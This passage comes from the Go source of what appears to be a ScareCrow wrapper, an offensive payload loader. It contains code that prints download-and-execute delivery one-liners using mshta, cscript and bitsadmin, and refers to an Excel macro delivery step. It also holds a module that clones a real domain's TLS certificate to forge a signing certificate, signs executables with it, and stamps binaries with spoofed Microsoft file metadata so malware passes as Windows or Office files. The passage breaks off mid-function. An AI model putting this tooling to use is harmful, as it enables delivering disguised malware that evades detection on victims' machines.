185 | fmt.Println("mshta.exe " + URL + "/" + outFile)
186 | }
187 | }
188 | if URL == "" && !strings.Contains(outFile, ".js") && !strings.Contains(outFile, ".hta") {
189 | fmt.Println(color.GreenString("[+] ") + "Non Executable file extension detected. Either add the extension \".js\" or use the following to execute it (note that this works from a local instance, webdav or fileshare... not a webserver):")
190 | fmt.Println("cscript //E:jscript " + outFile + "")
191 | }
192 | if URL != "" && CommandLoader == "macro" {
193 | if strings.HasSuffix(URL, "/") {
194 | } else {
195 | URL = URL + "/"
196 | }
197 | fmt.Println("[*] Macro Delivery Payload")
198 | fmt.Println("[!] Excel macro that will download, execute and remove the payload:")
199 | }
200 |
201 | if URL != "" && CommandLoader == "bits" {
202 | fmt.Println("[*] Bitsadmin")
203 | fmt.Println("[!] One liner command to execute it:")
204 | if !strings.Contains(outFile, ".js") && !strings.Contains(outFile, ".hta") && !strings.Contains(outFile, ".cpl") && !strings.Contains(outFile, ".exe") {
205 | if strings.HasSuffix(URL, "/") {
206 | fmt.Println("bitsadmin /transfer " + outFile + " " + URL + outFile + " %APPDATA%\\" + outFile + " & cscript //E: JScript %APPDATA%\\" + outFile + " & timeout 20 & del %APPDATA%\\" + outFile + "")
207 | } else {
208 | fmt.Println("bitsadmin /transfer " + outFile + " " + URL + "/" + outFile + " %APPDATA%\\" + outFile + " & cscript //E: JScript %APPDATA%\\" + outFile + " & timeout 20 & del %APPDATA%\\" + outFile + "")
209 | }
210 | } else {
211 | if strings.HasSuffix(URL, "/") {
212 | fmt.Println("bitsadmin /transfer " + outFile + " " + URL + outFile + " %APPDATA%\\" + outFile + " & %APPDATA%\\" + outFile + " & timeout 20 & del %APPDATA%\\" + outFile + "")
213 | } else {
214 | fmt.Println("bitsadmin /transfer " + outFile + " " + URL + "/" + outFile + " %APPDATA%\\" + outFile + " & %APPDATA%\\" + outFile + " & timeout 20 & del %APPDATA%\\" + outFile + "")
215 |
216 | }
217 | }
218 | }
219 | return URL
220 | }
221 |
--------------------------------------------------------------------------------
/Payload_Type/scarecrow_wrapper/agent_code/ScareCrow/go.mod:
--------------------------------------------------------------------------------
1 | module ScareCrow
2 |
3 | go 1.14
4 |
5 | require (
6 | github.com/akavel/rsrc v0.9.0 // indirect
7 | github.com/fatih/color v1.9.0
8 | github.com/josephspurrier/goversioninfo v0.0.0-20200309025242-14b0ab84c6ca
9 | github.com/minio/c2goasm v0.0.0-20190812172519-36a3d3bbc4f3 // indirect
10 | golang.org/x/sys v0.0.0-20210124154548-22da62e12c0c
11 | )
12 |
--------------------------------------------------------------------------------
/Payload_Type/scarecrow_wrapper/agent_code/ScareCrow/go.sum:
--------------------------------------------------------------------------------
1 | github.com/akavel/rsrc v0.9.0 h1:HwUDC0+tMFWqN4D5G+o5siGD4oVsC3jn6zM8ocjc3nY=
2 | github.com/akavel/rsrc v0.9.0/go.mod h1:uLoCtb9J+EyAqh+26kdrTgmzRBFPGOolLWKpdxkKq+c=
3 | github.com/fatih/color v1.9.0 h1:8xPHl4/q1VyqGIPif1F+1V3Y3lSmrq01EabUW3CoW5s=
4 | github.com/fatih/color v1.9.0/go.mod h1:eQcE1qtQxscV5RaZvpXrrb8Drkc3/DdQ+uUYCNjL+zU=
5 | github.com/google/go-cmp v0.5.5/go.mod h1:v8dTdLbMG2kIc/vJvl+f65V22dbkXbowE6jgT/gNBxE=
6 | github.com/josephspurrier/goversioninfo v0.0.0-20200309025242-14b0ab84c6ca h1:ozPUX9TKQZVek4lZWYRsQo7uS8vJ+q4OOHvRhHiCLfU=
7 | github.com/josephspurrier/goversioninfo v0.0.0-20200309025242-14b0ab84c6ca/go.mod h1:eJTEwMjXb7kZ633hO3Ln9mBUCOjX2+FlTljvpl9SYdE=
8 | github.com/kr/pretty v0.1.0/go.mod h1:dAy3ld7l9f0ibDNOQOHHMYYIIbhfbHSm3C4ZsoJORNo=
9 | github.com/kr/pty v1.1.1/go.mod h1:pFQYn66WHrOpPYNljwOMqo10TkYh1fy3cYio2l3bCsQ=
10 | github.com/kr/text v0.1.0/go.mod h1:4Jbv+DJW3UT/LiOwJeYQe1efqtUx/iVham/4vfdArNI=
11 | github.com/mattn/go-colorable v0.1.4 h1:snbPLB8fVfU9iwbbo30TPtbLRzwWu6aJS6Xh4eaaviA=
12 | github.com/mattn/go-colorable v0.1.4/go.mod h1:U0ppj6V5qS13XJ6of8GYAs25YV2eR4EVcfRqFIhoBtE=
13 | github.com/mattn/go-isatty v0.0.8/go.mod h1:Iq45c/XA43vh69/j3iqttzPXn0bhXyGjM0Hdxcsrc5s=
14 | github.com/mattn/go-isatty v0.0.11 h1:FxPOTFNqGkuDUGi3H/qkUbQO4ZiBa2brKq5r0l8TGeM=
15 | github.com/mattn/go-isatty v0.0.11/go.mod h1:PhnuNfih5lzO57/f3n+odYbM4JtupLOxQOAqxQCu2WE=
16 | github.com/minio/c2goasm v0.0.0-20190812172519-36a3d3bbc4f3 h1:+n/aFZefKZp7spd8DFdX7uMikMLXX4oubIzJF4kv/wI=
17 | github.com/minio/c2goasm v0.0.0-20190812172519-36a3d3bbc4f3/go.mod h1:RagcQ7I8IeTMnF8JTXieKnO4Z6JCsikNEzj0DwauVzE=
18 | github.com/rogpeppe/go-internal v1.7.1-0.20210131190821-dc4b49510d96/go.mod h1:xXDCJY+GAPziupqXw64V24skbSoqbTEfhy4qGm1nDQc=
19 | github.com/yuin/goldmark v1.2.1/go.mod h1:3hX8gzYuyVAZsxl0MRgGTJEmQBFcNTphYh9decYSb74=
20 | github.com/zetamatta/go-outputdebug v0.0.0-20200519164229-222c7991e4ae h1:LLvf5CCPekfeUlqQDGfVvds1kMf4hBfcAkpzYHqjYV4=
21 | github.com/zetamatta/go-outputdebug v0.0.0-20200519164229-222c7991e4ae/go.mod h1:oWzR58pjEbqmQK35Wh+slsMO3H4Chi/24zVIyqJfWNI=
22 | golang.org/x/crypto v0.0.0-20190308221718-c2843e01d9a2/go.mod h1:djNgcEr1/C05ACkg1iLfiJU5Ep61QUkGW8qpdssI0+w=
23 | golang.org/x/crypto v0.0.0-20191011191535-87dc89f01550/go.mod h1:yigFU9vqHzYiE8UmvKecakEJjdnWj3jj499lnFckfCI=
24 | golang.org/x/crypto v0.0.0-20200622213623-75b288015ac9/go.mod h1:LzIPMQfyMNhhGPhUkYOs5KpL4U8rLKemX1yGLhDgUto=
25 | golang.org/x/mod v0.4.1 h1:Kvvh58BN8Y9/lBi7hTekvtMpm07eUZ0ck5pRHpsMWrY=
26 | golang.org/x/mod v0.4.1/go.mod h1:s0Qsj1ACt9ePp/hMypM3fl4fZqREWJwdYDEqhRiZZUA=
27 | golang.org/x/net v0.0.0-20190404232315-eb5bcb51f2a3/go.mod h1:t9HGtf8HONx5eT2rtn7q6eTqICYqUVnKs3thJo3Qplg=
28 | golang.org/x/net v0.0.0-20190620200207-3b0461eec859/go.mod h1:z5CRVTTTmAJ677TzLLGU+0bjPO0LkuOLi4/5GtJWs/s=
29 | golang.org/x/net v0.0.0-20201021035429-f5854403a974/go.mod h1:sp8m0HH+o8qH0wwXwYZr8TS3Oi6o0r6Gce1SSxlDquU=
30 | golang.org/x/sync v0.0.0-20190423024810-112230192c58/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM=
31 | golang.org/x/sync v0.0.0-20201020160332-67f06af15bc9/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM=
32 | golang.org/x/sys v0.0.0-20190215142949-d0b11bdaac8a/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY=
33 | golang.org/x/sys v0.0.0-20190222072716-a9d3bda3a223/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY=
34 | golang.org/x/sys v0.0.0-20190412213103-97732733099d/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
35 | golang.org/x/sys v0.0.0-20191026070338-33540a1f6037/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
36 | golang.org/x/sys v0.0.0-20200625212154-ddb9806d33ae h1:Ih9Yo4hSPImZOpfGuA4bR/ORKTAbhZo2AbWNRCnevdo=
37 | golang.org/x/sys v0.0.0-20200625212154-ddb9806d33ae/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
38 | golang.org/x/sys v0.0.0-20200930185726-fdedc70b468f/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
39 | golang.org/x/sys v0.0.0-20210124154548-22da62e12c0c/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
40 | golang.org/x/text v0.3.0/go.mod h1:NqM8EUOU14njkJ3fqMW+pc6Ldnwhi/IjpwHt7yyuwOQ=
41 | golang.org/x/text v0.3.3/go.mod h1:5Zoc/QRtKVWzQhOtBMvqHzDpF6irO9z98xDceosuGiQ=
42 | golang.org/x/tools v0.0.0-20180917221912-90fa682c2a6e/go.mod h1:n7NCudcB/nEzxVGmLbDWY5pfWTLqBcC2KZ6jyYvM4mQ=
43 | golang.org/x/tools v0.0.0-20191119224855-298f0cb1881e/go.mod h1:b+2E5dAYhXwXZwtnZ6UAqBI28+e2cm9otk0dWdXHAEo=
44 | golang.org/x/tools v0.1.1-0.20210304221016-50ca8d007de9 h1:lQ9QDTM4SHDP/S/bmj2wjNMQ93AvRYf7kuoqr2MDxmc=
45 | golang.org/x/tools v0.1.1-0.20210304221016-50ca8d007de9/go.mod h1:9bzcO0MWcOuT0tm1iBGzDVPshzfwoVvREIui8C+MHqU=
46 | golang.org/x/xerrors v0.0.0-20190717185122-a985d3407aa7/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0=
47 | golang.org/x/xerrors v0.0.0-20191011141410-1b5146add898/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0=
48 | golang.org/x/xerrors v0.0.0-20191204190536-9bdfabe68543/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0=
49 | golang.org/x/xerrors v0.0.0-20200804184101-5ec99f83aff1 h1:go1bK/D/BFZV2I8cIQd1NKEZ+0owSTG1fDTci4IqFcE=
50 | golang.org/x/xerrors v0.0.0-20200804184101-5ec99f83aff1/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0=
51 | gopkg.in/check.v1 v1.0.0-20180628173108-788fd7840127/go.mod h1:Co6ibVJAznAaIkqp8huTwlJQCZ016jof/cbN4VW5Yz0=
52 | gopkg.in/errgo.v2 v2.1.0/go.mod h1:hNsd1EY+bozCKY1Ytp96fpM3vjJbqLJn88ws8XvfDNI=
53 | mvdan.cc/garble v0.2.0 h1:EcSXSbx2ocE42m1tpbSPh0MBu6uYewWj82qyWfXjr7s=
54 | mvdan.cc/garble v0.2.0/go.mod h1:9htOtPZGNFoUyS7Y/R/T7vfnEi386kmsOAhNEoc24ts=
55 |
--------------------------------------------------------------------------------
/Payload_Type/scarecrow_wrapper/agent_code/ScareCrow/limelighter/limelighter.go:
--------------------------------------------------------------------------------
1 | package limelighter
2 |
3 | import (
4 | "bytes"
5 | "crypto/rand"
6 | "crypto/rsa"
7 | "crypto/tls"
8 | "crypto/x509"
9 | "crypto/x509/pkix"
10 | "encoding/pem"
11 | "fmt"
12 | "io"
13 | "io/ioutil"
14 | "log"
15 | crand "math/rand"
16 | "os"
17 | "os/exec"
18 | "strings"
19 | "time"
20 |
21 | "github.com/josephspurrier/goversioninfo"
22 | )
23 |
24 | const letters = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890"
25 |
26 | func VarNumberLength(min, max int) string {
27 | var r string
28 | crand.Seed(time.Now().UnixNano())
29 | num := crand.Intn(max-min) + min
30 | n := num
31 | r = RandStringBytes(n)
32 | return r
33 | }
34 | func RandStringBytes(n int) string {
35 | b := make([]byte, n)
36 | for i := range b {
37 | b[i] = letters[crand.Intn(len(letters))]
38 |
39 | }
40 | return string(b)
41 | }
42 |
43 | func GenerateCert(domain string, inputFile string) {
44 | var err error
45 | rootKey, err := rsa.GenerateKey(rand.Reader, 4096)
46 | if err != nil {
47 | panic(err)
48 | }
49 | certs, err := GetCertificatesPEM(domain + ":443")
50 | if err != nil {
51 | os.Chdir("..")
52 | foldername := strings.Split(inputFile, ".")
53 | os.RemoveAll(foldername[0])
54 | log.Fatal("Error: The domain: " + domain + " does not exist or is not accessible from the host you are compiling on")
55 | }
56 | block, _ := pem.Decode([]byte(certs))
57 | cert, _ := x509.ParseCertificate(block.Bytes)
58 |
59 | keyToFile(domain+".key", rootKey)
60 |
61 | SubjectTemplate := x509.Certificate{
62 | SerialNumber: cert.SerialNumber,
63 | Subject: pkix.Name{
64 | CommonName: cert.Subject.CommonName,
65 | },
66 | NotBefore: cert.NotBefore,
67 | NotAfter: cert.NotAfter,
68 | BasicConstraintsValid: true,
69 | IsCA: true,
70 | KeyUsage: x509.KeyUsageDigitalSignature | x509.KeyUsageCertSign,
71 | ExtKeyUsage: []x509.ExtKeyUsage{x509.ExtKeyUsageServerAuth, x509.ExtKeyUsageClientAuth},
72 | }
73 | IssuerTemplate := x509.Certificate{
74 | SerialNumber: cert.SerialNumber,
75 | Subject: pkix.Name{
76 | CommonName: cert.Issuer.CommonName,
77 | },
78 | NotBefore: cert.NotBefore,
79 | NotAfter: cert.NotAfter,
80 | }
81 | derBytes, err := x509.CreateCertificate(rand.Reader, &SubjectTemplate, &IssuerTemplate, &rootKey.PublicKey, rootKey)
82 | if err != nil {
83 | panic(err)
84 | }
85 | certToFile(domain+".pem", derBytes)
86 |
87 | }
88 |
89 | func keyToFile(filename string, key *rsa.PrivateKey) {
90 | file, err := os.Create(filename)
91 | if err != nil {
92 | panic(err)
93 | }
94 | defer file.Close()
95 | b, err := x509.MarshalPKCS8PrivateKey(key)
96 | if err != nil {
97 | fmt.Fprintf(os.Stderr, "Unable to marshal RSA private key: %v", err)
98 | os.Exit(2)
99 | }
100 | if err := pem.Encode(file, &pem.Block{Type: "RSA PRIVATE KEY", Bytes: b}); err != nil {
101 | panic(err)
102 | }
103 | }
104 |
105 | func certToFile(filename string, derBytes []byte) {
106 | certOut, err := os.Create(filename)
107 | if err != nil {
108 | log.Fatalf("[-] Failed to Open cert.pem for Writing: %s", err)
109 | }
110 | if err := pem.Encode(certOut, &pem.Block{Type: "CERTIFICATE", Bytes: derBytes}); err != nil {
111 | log.Fatalf("[-] Failed to Write Data to cert.pem: %s", err)
112 | }
113 | if err := certOut.Close(); err != nil {
114 | log.Fatalf("[-] Error Closing cert.pem: %s", err)
115 | }
116 | }
117 |
118 | func GetCertificatesPEM(address string) (string, error) {
119 | conn, err := tls.Dial("tcp", address, &tls.Config{
120 | InsecureSkipVerify: true,
121 | })
122 | if err != nil {
123 | return "", err
124 | }
125 | defer conn.Close()
126 | var b bytes.Buffer
127 | for _, cert := range conn.ConnectionState().PeerCertificates {
128 | err := pem.Encode(&b, &pem.Block{
129 | Type: "CERTIFICATE",
130 | Bytes: cert.Raw,
131 | })
132 | if err != nil {
133 | return "", err
134 | }
135 | }
136 | return b.String(), nil
137 | }
138 |
139 | func GeneratePFK(password string, domain string) {
140 | cmd := exec.Command("openssl", "pkcs12", "-export", "-out", domain+".pfx", "-inkey", domain+".key", "-in", domain+".pem", "-passin", "pass:"+password+"", "-passout", "pass:"+password+"")
141 | err := cmd.Run()
142 | if err != nil {
143 | log.Fatalf("cmd.Run() failed with %s\n", err)
144 | }
145 | }
146 |
147 | func SignExecutable(password string, pfx string, filein string, fileout string) {
148 | cmd := exec.Command("osslsigncode", "sign", "-pkcs12", pfx, "-in", ""+filein+"", "-out", ""+fileout+"", "-pass", ""+password+"")
149 | err := cmd.Run()
150 | if err != nil {
151 | log.Fatalf("cmd.Run() failed with %s\n", err)
152 | }
153 | }
154 |
155 | func FileProperties(name string, configFile string) string {
156 | fmt.Println("[*] Creating an Embedded Resource File")
157 | vi := &goversioninfo.VersionInfo{}
158 | if configFile != "" {
159 | var err error
160 | input := io.ReadCloser(os.Stdin)
161 | if input, err = os.Open("../" + configFile); err != nil {
162 | log.Printf("Cannot open %q: %v", configFile, err)
163 | os.Exit(3)
164 | }
165 | jsonBytes, err := ioutil.ReadAll(input)
166 | input.Close()
167 | if err != nil {
168 | log.Printf("Error reading %q: %v", configFile, err)
169 | os.Exit(3)
170 | }
171 | if err := vi.ParseJSON(jsonBytes); err != nil {
172 | log.Printf("Could not parse the .json file: %v", err)
173 | os.Exit(3)
174 | }
175 | name = vi.StringFileInfo.InternalName
176 | } else if configFile == "" {
177 | if name == "APMon" {
178 | vi.StringFileInfo.CompanyName = "Microsoft Corporation"
179 | vi.StringFileInfo.InternalName = "APMon.dll.mui"
180 | vi.StringFileInfo.FileDescription = "Adaptive Port Monitor"
181 | vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)"
182 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
183 | vi.StringFileInfo.OriginalFilename = "C:\\Windows\\System32\\APMon.dll"
184 | vi.FixedFileInfo.ProductVersion.Patch = 18362
185 | vi.FixedFileInfo.ProductVersion.Major = 10
186 | vi.FixedFileInfo.ProductVersion.Minor = 0
187 | vi.StringFileInfo.ProductName = "Microsoft Corporation"
188 | vi.StringFileInfo.ProductVersion = "10.0.18362.1"
189 | vi.FixedFileInfo.FileVersion.Major = 1
190 | vi.FixedFileInfo.FileVersion.Minor = 0
191 | vi.FixedFileInfo.FileVersion.Patch = 18362
192 | vi.FixedFileInfo.FileVersion.Build = 1
193 | vi.StringFileInfo.InternalName = "APMon.dll.mui"
194 | }
195 | if name == "bisr" {
196 | vi.StringFileInfo.CompanyName = "Microsoft Corporation"
197 | vi.StringFileInfo.InternalName = "bisrv.dll.mui"
198 | vi.StringFileInfo.FileDescription = "Background Tasks Infrastructure Service"
199 | vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)"
200 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
201 | vi.StringFileInfo.OriginalFilename = "C:\\Windows\\System32\bisrv.dll"
202 | vi.FixedFileInfo.ProductVersion.Patch = 18362
203 | vi.FixedFileInfo.ProductVersion.Major = 10
204 | vi.FixedFileInfo.ProductVersion.Minor = 0
205 | vi.StringFileInfo.ProductName = "Microsoft Corporation"
206 | vi.StringFileInfo.ProductVersion = "10.0.18362.1"
207 | vi.FixedFileInfo.FileVersion.Major = 1
208 | vi.FixedFileInfo.FileVersion.Minor = 0
209 | vi.FixedFileInfo.FileVersion.Patch = 18362
210 | vi.FixedFileInfo.FileVersion.Build = 1
211 | vi.StringFileInfo.InternalName = "bisrv.dll.mui"
212 | }
213 | if name == "btpanui" {
214 | vi.StringFileInfo.CompanyName = "Microsoft Corporation"
215 | vi.StringFileInfo.InternalName = "btpanui.dll.mui"
216 | vi.StringFileInfo.FileDescription = "Bluetooth PAN User Interface"
217 | vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)"
218 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
219 | vi.StringFileInfo.OriginalFilename = "C:\\Windows\\System32\btpanui.dll"
220 | vi.FixedFileInfo.ProductVersion.Patch = 18362
221 | vi.FixedFileInfo.ProductVersion.Major = 10
222 | vi.FixedFileInfo.ProductVersion.Minor = 0
223 | vi.StringFileInfo.ProductName = "Microsoft Corporation"
224 | vi.StringFileInfo.ProductVersion = "10.0.18362.1"
225 | vi.FixedFileInfo.FileVersion.Major = 1
226 | vi.FixedFileInfo.FileVersion.Minor = 0
227 | vi.FixedFileInfo.FileVersion.Patch = 18362
228 | vi.FixedFileInfo.FileVersion.Build = 1
229 | vi.StringFileInfo.InternalName = "btpanui.dll.mui"
230 | }
231 | if name == "cmdext" {
232 | vi.StringFileInfo.CompanyName = "Microsoft Corporation"
233 | vi.StringFileInfo.InternalName = "CmdExt.DLL"
234 | vi.StringFileInfo.FileDescription = "cmd.exe Extension DLL"
235 | vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)"
236 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
237 | vi.StringFileInfo.OriginalFilename = "C:\\Windows\\System32\\cmdext.dll"
238 | vi.FixedFileInfo.ProductVersion.Patch = 18362
239 | vi.FixedFileInfo.ProductVersion.Major = 10
240 | vi.FixedFileInfo.ProductVersion.Minor = 0
241 | vi.StringFileInfo.ProductName = "Microsoft Corporation"
242 | vi.StringFileInfo.ProductVersion = "10.0.18362.1"
243 | vi.FixedFileInfo.FileVersion.Major = 1
244 | vi.FixedFileInfo.FileVersion.Minor = 0
245 | vi.FixedFileInfo.FileVersion.Patch = 18362
246 | vi.FixedFileInfo.FileVersion.Build = 1
247 | vi.StringFileInfo.InternalName = "CmdExt.DLL"
248 | }
249 | if name == "httpapi" {
250 | vi.StringFileInfo.CompanyName = "Microsoft Corporation"
251 | vi.StringFileInfo.InternalName = "httpapi.dll.mui"
252 | vi.StringFileInfo.FileDescription = "HTTP Protocol Stack API"
253 | vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)"
254 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
255 | vi.StringFileInfo.OriginalFilename = "C:\\Windows\\System32\\httpapi.dll"
256 | vi.FixedFileInfo.ProductVersion.Patch = 18362
257 | vi.FixedFileInfo.ProductVersion.Major = 10
258 | vi.FixedFileInfo.ProductVersion.Minor = 0
259 | vi.StringFileInfo.ProductName = "Microsoft Corporation"
260 | vi.StringFileInfo.ProductVersion = "10.0.18362.1"
261 | vi.FixedFileInfo.FileVersion.Major = 1
262 | vi.FixedFileInfo.FileVersion.Minor = 0
263 | vi.FixedFileInfo.FileVersion.Patch = 18362
264 | vi.FixedFileInfo.FileVersion.Build = 1
265 | vi.StringFileInfo.InternalName = "httpapi.dll.mui"
266 | }
267 | if name == "logoncli" {
268 | vi.StringFileInfo.CompanyName = "Microsoft Corporation"
269 | vi.StringFileInfo.InternalName = "LOGONCLI.DLL"
270 | vi.StringFileInfo.FileDescription = "Net Logon Client DLL"
271 | vi.StringFileInfo.FileVersion = "10.0.18362.1237 (WinBuild.160101.0800)"
272 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
273 | vi.StringFileInfo.OriginalFilename = "C:\\Windows\\System32\\logoncli.dll"
274 | vi.FixedFileInfo.ProductVersion.Patch = 18362
275 | vi.FixedFileInfo.ProductVersion.Major = 10
276 | vi.FixedFileInfo.ProductVersion.Minor = 0
277 | vi.StringFileInfo.ProductName = "Microsoft Corporation"
278 | vi.StringFileInfo.ProductVersion = "10.0.18362.1237"
279 | vi.FixedFileInfo.FileVersion.Major = 1
280 | vi.FixedFileInfo.FileVersion.Minor = 0
281 | vi.FixedFileInfo.FileVersion.Patch = 18362
282 | vi.FixedFileInfo.FileVersion.Build = 1237
283 | vi.StringFileInfo.InternalName = "LOGONCLI.DLL"
284 | }
285 | if name == "netlogon" {
286 | vi.StringFileInfo.CompanyName = "Microsoft Corporation"
287 | vi.StringFileInfo.InternalName = "NetLogon.DLL.MUI"
288 | vi.StringFileInfo.FileDescription = "Net Logon Services DLL"
289 | vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)"
290 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
291 | vi.StringFileInfo.OriginalFilename = "C:\\Windows\\System32\netlogon.dll"
292 | vi.FixedFileInfo.ProductVersion.Patch = 18362
293 | vi.FixedFileInfo.ProductVersion.Major = 10
294 | vi.FixedFileInfo.ProductVersion.Minor = 0
295 | vi.StringFileInfo.ProductName = "Microsoft Corporation"
296 | vi.StringFileInfo.ProductVersion = "10.0.18362.1"
297 | vi.FixedFileInfo.FileVersion.Major = 1
298 | vi.FixedFileInfo.FileVersion.Minor = 0
299 | vi.FixedFileInfo.FileVersion.Patch = 18362
300 | vi.FixedFileInfo.FileVersion.Build = 1
301 | vi.StringFileInfo.InternalName = "NetLogon.DLL.MUI"
302 | }
303 | if name == "tcpmon" {
304 | vi.StringFileInfo.CompanyName = "Microsoft Corporation"
305 | vi.StringFileInfo.InternalName = "tcpmon.dll.mui"
306 | vi.StringFileInfo.FileDescription = "Standard TCP/IP Port Monitor DLL"
307 | vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)"
308 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
309 | vi.StringFileInfo.OriginalFilename = "C:\\Windows\\System32\tcpmon.dll"
310 | vi.FixedFileInfo.ProductVersion.Patch = 18362
311 | vi.FixedFileInfo.ProductVersion.Major = 10
312 | vi.FixedFileInfo.ProductVersion.Minor = 0
313 | vi.StringFileInfo.ProductName = "Microsoft Corporation"
314 | vi.StringFileInfo.ProductVersion = "10.0.18362.1"
315 | vi.FixedFileInfo.FileVersion.Major = 1
316 | vi.FixedFileInfo.FileVersion.Minor = 0
317 | vi.FixedFileInfo.FileVersion.Patch = 18362
318 | vi.FixedFileInfo.FileVersion.Build = 1
319 | vi.StringFileInfo.InternalName = "tcpmon.dll.mui"
320 | }
321 | if name == "OneNote" {
322 | vi.StringFileInfo.CompanyName = "Microsoft Corporation"
323 | vi.StringFileInfo.InternalName = "OneNote"
324 | vi.StringFileInfo.FileDescription = "Microsoft OneNote"
325 | vi.StringFileInfo.FileVersion = "16.0.13901.20462"
326 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
327 | vi.StringFileInfo.OriginalFilename = "C:\\Program Files\\Microsoft Office\\root\\Office16\\ONENOTE.EXE"
328 | vi.FixedFileInfo.ProductVersion.Patch = 13901
329 | vi.FixedFileInfo.ProductVersion.Major = 16
330 | vi.FixedFileInfo.ProductVersion.Minor = 0
331 | vi.StringFileInfo.ProductName = "Microsoft Office"
332 | vi.StringFileInfo.ProductVersion = "16.0.13901.20462"
333 | vi.FixedFileInfo.FileVersion.Major = 16
334 | vi.FixedFileInfo.FileVersion.Minor = 0
335 | vi.FixedFileInfo.FileVersion.Patch = 13901
336 | vi.FixedFileInfo.FileVersion.Build = 20462
337 | vi.StringFileInfo.InternalName = "OneNote"
338 | }
339 |
340 | if name == "Excel" {
341 | vi.StringFileInfo.CompanyName = "Microsoft Corporation"
342 | vi.StringFileInfo.InternalName = "Excel"
343 | vi.StringFileInfo.FileDescription = "Microsoft Excel"
344 | vi.StringFileInfo.FileVersion = "16.0.11929.20838"
345 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
346 | vi.StringFileInfo.OriginalFilename = "C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE"
347 | vi.FixedFileInfo.ProductVersion.Patch = 11929
348 | vi.FixedFileInfo.ProductVersion.Major = 16
349 | vi.FixedFileInfo.ProductVersion.Minor = 0
350 | vi.StringFileInfo.ProductName = "Microsoft Office"
351 | vi.StringFileInfo.ProductVersion = "16.0.11929.20838"
352 | vi.FixedFileInfo.FileVersion.Major = 16
353 | vi.FixedFileInfo.FileVersion.Minor = 0
354 | vi.FixedFileInfo.FileVersion.Patch = 11929
355 | vi.FixedFileInfo.FileVersion.Build = 20838
356 | vi.StringFileInfo.InternalName = "Excel"
357 | }
358 | if name == "Word" {
359 | vi.StringFileInfo.CompanyName = "Microsoft Corporation"
360 | vi.StringFileInfo.InternalName = "Word"
361 | vi.StringFileInfo.FileDescription = "Microsoft Word"
362 | vi.StringFileInfo.FileVersion = "16.0.11929.20838"
363 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
364 | vi.StringFileInfo.OriginalFilename = "C:\\Program Files\\Microsoft Office\\root\\Office16\\WORD.EXE"
365 | vi.FixedFileInfo.ProductVersion.Patch = 11929
366 | vi.FixedFileInfo.ProductVersion.Major = 16
367 | vi.FixedFileInfo.ProductVersion.Minor = 0
368 | vi.StringFileInfo.ProductName = "Microsoft Office"
369 | vi.StringFileInfo.ProductVersion = "16.0.11929.20838"
370 | vi.FixedFileInfo.FileVersion.Major = 16
371 | vi.FixedFileInfo.FileVersion.Minor = 0
372 | vi.FixedFileInfo.FileVersion.Patch = 11929
373 | vi.FixedFileInfo.FileVersion.Build = 20838
374 | vi.StringFileInfo.InternalName = "Word"
375 | }
376 | if name == "Powerpnt" {
377 | vi.StringFileInfo.CompanyName = "Microsoft Corporation"
378 | vi.StringFileInfo.InternalName = "POWERPNT"
379 | vi.StringFileInfo.FileDescription = "Microsoft PowerPoint"
380 | vi.StringFileInfo.FileVersion = "16.0.11929.20838"
381 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
382 | vi.StringFileInfo.OriginalFilename = "C:\\Program Files\\Microsoft Office\\root\\Office16\\POWERPNT.EXE"
383 | vi.FixedFileInfo.ProductVersion.Patch = 11929
384 | vi.FixedFileInfo.ProductVersion.Major = 16
385 | vi.FixedFileInfo.ProductVersion.Minor = 0
386 | vi.StringFileInfo.ProductName = "Microsoft Office"
387 | vi.StringFileInfo.ProductVersion = "16.0.11929.20838"
388 | vi.FixedFileInfo.FileVersion.Major = 16
389 | vi.FixedFileInfo.FileVersion.Minor = 0
390 | vi.FixedFileInfo.FileVersion.Patch = 11929
391 | vi.FixedFileInfo.FileVersion.Build = 20838
392 | vi.StringFileInfo.InternalName = "POWERPNT"
393 | }
394 | if name == "Outlook" {
